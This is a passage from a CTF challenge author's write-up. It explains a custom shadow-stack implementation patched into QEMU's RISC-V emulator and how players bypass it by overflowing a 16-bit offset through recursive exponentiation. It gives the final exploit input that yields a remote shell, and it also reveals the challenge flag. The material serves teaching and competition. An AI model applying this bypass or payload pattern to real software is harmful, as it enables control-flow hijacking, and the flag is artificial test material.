The second instruction, obscure, relies on 2 custom helper functions:

xlen_bytes(), which returns the address size for the current architecture, in bytes (In RISCV-64 it is 8).
get_darkest_address(), which computes darkest_address as the sum of dark_page and dark_offset. It can be seen as the shadow stack pointer.

Here is the pseudo-code for get_darkest_address():

// get_darkest_address()

TCG[dark_page] = CSR[dark_page] // gen_helper_csrr (CSR read)
TCG[darkest_address] = TCG[dark_page] + TCG[dark_offset] // tcg_gen_add_tl (addition)

And there for obscure:

// obscure rs1

TCG[dark_offset] = CSR[dark_offset]; // gen_helper_csrr
TCG[darkest_address] = get_darkest_address();

*TCG[darkest_address] = GPR[rs1]; // tcg_gen_qemu_st_tl (store)

TCG[dark_offset] = TCG[dark_offset] + xlen_bytes(); // tcg_gen_addi_tl (add immediate)
CSR[dark_offset] = TCG[dark_offset]; // gen_helper_csrw

The instruction realizes a push to the shadow stack. It retrieves the shadow stack pointer and stores the address passed through rs1 in the pointed shadow stack cell. The dark_offset is then incremented so that it always indicates the first empty cell.

In the calculator, it is used at the beginning of every function from calc.c, with the IN_SHADOW macro:

#ifndef SUNBATH
#define IN_SHADOW \
  asm volatile(   \
    "obscure ra"  \
  );
#else
#define IN_SHADOW
#endif

obscure instruction — The new `obscure` instruction

diff --git a/target/riscv/insn_trans/trans_rvi.c.inc b/target/riscv/insn_trans/trans_rvi.c.inc
index 4ad54e8a49..31062b27c3 100644
--- a/target/riscv/insn_trans/trans_rvi.c.inc
+++ b/target/riscv/insn_trans/trans_rvi.c.inc
@@ -65,6 +65,30 @@ static bool trans_jalr(DisasContext *ctx, arg_jalr *a)
     }
 
     gen_set_gpri(ctx, a->rd, ctx->pc_succ_insn);
+
+    if (a->rd == 0 && a->rs1 == xRA && a->imm == 0) {
+        TCGLabel *shadow_pact_end = gen_new_label();
+
+        TCGv dark_offset = tcg_temp_new();
+        TCGv_i32 csr_darkoff = tcg_constant_i32(CSR_DARKOFF);
+        gen_helper_csrr(dark_offset, cpu_env, csr_darkoff);
+        tcg_gen_brcondi_tl(TCG_COND_EQ, dark_offset, 0, shadow_pact_end);
+
+        tcg_gen_addi_tl(dark_offset, dark_offset, -1 * get_xlen_bytes(ctx));
+        gen_helper_csrw(cpu_env, csr_darkoff, dark_offset);
+        TCGv darkest_address = get_darkest_address(ctx, dark_offset);
+
+        TCGv dark_pc = tcg_temp_new();
+        tcg_gen_qemu_ld_tl(dark_pc, darkest_address, ctx->mem_idx,
+                           MO_ALIGN | MO_TE | size_memop(get_xlen_bytes(ctx)));
+        tcg_gen_brcond_tl(TCG_COND_EQ, cpu_pc, dark_pc, shadow_pact_end);
+
+        tcg_gen_st_tl(cpu_pc, cpu_env, offsetof(CPURISCVState, badaddr));
+        generate_exception(ctx, RISCV_EXCP_SHADOW);
+
+        gen_set_label(shadow_pact_end);
+    }
+
     lookup_and_goto_ptr(ctx);
 
     if (misaligned) {

This part of the patch modifies the logic for the jalr instruction when the condition a->rd == 0 && a->rs1 == xRA && a->imm == 0 is met. This corresponds to a jalr x0, xRA, 0 which is what the pseudo-instruction ret extends to.

The pseudo-code added to the ret is:

// [...] Normal jalr instruction

TCG[dark_offset] = CSR[dark_offset]; // gen_helper_csrr
if (TCG[dark_offset] == 0) goto LABEL_shadow_pact_end; // tcg_gen_brcondi_tl (conditionnal jump, comparison against an immediate)

TCG[dark_offset] = TCG[dark_offset] - xlen_bytes(); // tcg_gen_addi_tl
CSR[dark_offset] = TCG[dark_offset]; // gen_helper_csrw

TCG[darkest_address] = darkest_adress();
TCG[dark_pc] = *TCG[darkest_address]; // tcg_gen_qemu_ld_tl (load)
if (PC == TCG[dark_pc]) goto LABEL_shadow_pact_end; // tcg_gen_brcond_tl (conditionnal jump)

// If we reach here, we trigger a shadow exception!

LABEL_shadow_pact_end:

// [...] Normal jalr instruction

The augmented instructions now make a pop from the shadow stack. The popped value, called dark_pc, is compared to the pc originally computed by the jalr instructions. If they are different, then a shadow exception is triggered.

All the logic is circumvented if the shadow stack is in its post-initialization, unused state, with the dark_offset containing 0.

jalr instruction — Addition to the `jalr` instruction

diff --git a/linux-user/riscv/cpu_loop.c b/linux-user/riscv/cpu_loop.c
index bffca7db12..85e9bfceb0 100644
--- a/linux-user/riscv/cpu_loop.c
+++ b/linux-user/riscv/cpu_loop.c
@@ -72,6 +72,17 @@ void cpu_loop(CPURISCVState *env)
                 goto gdbstep;
             }
             break;
+        case RISCV_EXCP_SHADOW:
+            fprintf(stderr, "\n");
+            fprintf(stderr, "================================================\n");
+            fprintf(stderr, "Shadow exception triggered!\n");
+            fprintf(stderr, "(Conveniently handled as an illegal instruction)\n");
+            fprintf(stderr, "\n");
+            fprintf(stderr, "The current dark page is 0x" TARGET_FMT_lx "\n", env->dark_page);
+            fprintf(stderr, "The current dark offset is 0x%" PRIx8 "\n", env->dark_offset);
+            fprintf(stderr, "================================================\n");
+            fprintf(stderr, "\n");
+            __attribute__ ((fallthrough));
         case RISCV_EXCP_ILLEGAL_INST:
             force_sig_fault(TARGET_SIGILL, TARGET_ILL_ILLOPC, env->pc);
             break;

This final part handles the new shadow exception. An error message is displayed, indicating the status of the two custom registers, to help the players for debugging purposes. The exception then falls through to the standard illegal instruction and the program comes to a stop.

Let’s get back to pwning. As mentioned earlier, the patch’s weakness lies in the ability to overflow the dark_offset, encoded as an uint16_t. Since pushing a value on the stack (calling obscure) increases this offset by 8, we need at least 2^(16-3) = 8192 protected function calls to overflow the offset.

This can be achieved with the power operation which is implemented recursively by the calculator:

void handle_power (node_t* node, int64_t results[], int64_t power) {
  IN_SHADOW

  if (power == 0) {
    return;
  }
  node_t *node_l = node->content.binop.node_l;
  results[node->content.binop.id] *= get_value(node_l, results);
  handle_power(node, results, --power);
}

error_kind do_power (node_t* node, int64_t results[]) {
  IN_SHADOW

  node_t *node_l = node->content.binop.node_l;
  node_t *node_r = node->content.binop.node_r;
  int64_t power = get_value(node_r, results);

  if (power < 0) {
    return ERROR_POWER_NEGATIVE;
  }
  if (power == 0) {
    results[node->content.binop.id] = 1;
    return ERROR_NO_ERROR;
  }

  results[node->content.binop.id] = get_value(node_l, results);
  handle_power(node, results, --power);

  return ERROR_NO_ERROR;
}

We can use a value larger than 8192, for instance 10000: the extra function calls pass the overflow will just return and the dark_offset will stop at zero.

Further return operations will keep the offset at 0 and the shadow stack disabled. Even if we call a protected function at some point, re-enabling the shadow stack at this moment, this function will eventually return.

This behaviour is actually used in the program: the main function is not protected and can therefore make use of libc functions. Once main calls secure_calc, the shadow stack is used and then it is only possible to use protected functions (this implied that I had, for instance, to implement a custom memzero function inside calc.c). After secure_calc returns, it is possible to use unprotected libc functions again.

Hence, the shadow stack bypass will work whenever it happens during the calculation, and we can just adapt the previous payload by replacing a (1)(1) operation with (1**10000), resulting in:

(1**10000)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(1)(0+1-1)+(0*0*0+274886825460+0+700628+0-798784)

This finally gives us a remote shell, and the flag: ECW{1n57ruc710n_5375_w4n7_70_b3_fr33} (a reference to a milestone paper in RISC-V early history).

As a sidenote, this implementation of a shadow stack has other flaws. Namely, no special permission is set up in the MMU for the memory region hosting the shadow stack (which lies in user space). Therefore, the memory here is freely mutable by an attacker with a write primitive, bypassing the protection.

If you are interested in further resources on the subject, an official draft specification for an official RISC-V shadow stack is available with the Zicfiss extension, part of the RISC-V CFI Specification. There is also a corresponding attempted QEMU PR.

Conclusion

Ever since my student days when I learned about shadow stacks, it had always been a frustration of mine not having the occasion to actually implement one, so now things are settled.

It was my first time designing a challenge, and I would like to thank my colleagues for their precious feedback, tips and testing without which this challenge wouldn’t be as it is.

Finally, thanks to all the players who attempted to solve The Calculator in Shadow, I hope I was able to convey my enthusiasm for RISC-V with you!